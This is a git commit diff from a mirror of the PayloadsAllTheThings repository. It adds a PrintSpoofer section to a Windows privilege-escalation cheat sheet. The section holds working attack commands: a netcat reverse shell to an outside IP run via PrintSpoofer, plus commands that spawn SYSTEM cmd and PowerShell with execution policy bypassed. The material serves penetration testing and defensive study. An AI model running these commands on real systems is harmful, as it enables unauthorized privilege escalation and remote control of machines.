Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

add priv esc windows

Browse source
This commit is contained in:
enaylal 2023-11-16 23:37:12 +01:00
parent d93a228b40
commit 4684fed4aa
1 changed files with 16 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
Methodology and Resources/Windows - Privilege Escalation.md
View file

@ -49,6 +49,7 @@
* [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
* [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))
* [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))
* [PrintSpoofer (Printer Bug)](#PrintSpoofer-Printer-Bug)))
* [EoP - Privileged File Write](#eop---privileged-file-write)
* [DiagHub](#diaghub)
* [UsoDLLLoader](#usodllloader)
@ -1264,6 +1265,21 @@ JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juic
```
### PrintSpoofer (Printer Bug)
> this work if SeImpersonatePrivilege is enabled
* Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
```powershell
# run nc -lnvp 443 then :
.\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd"
# without listener
.\PrintSpoofer64.exe -i -c cmd
# Via RPD
.\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass"
```
## EoP - Privileged File Write
### DiagHub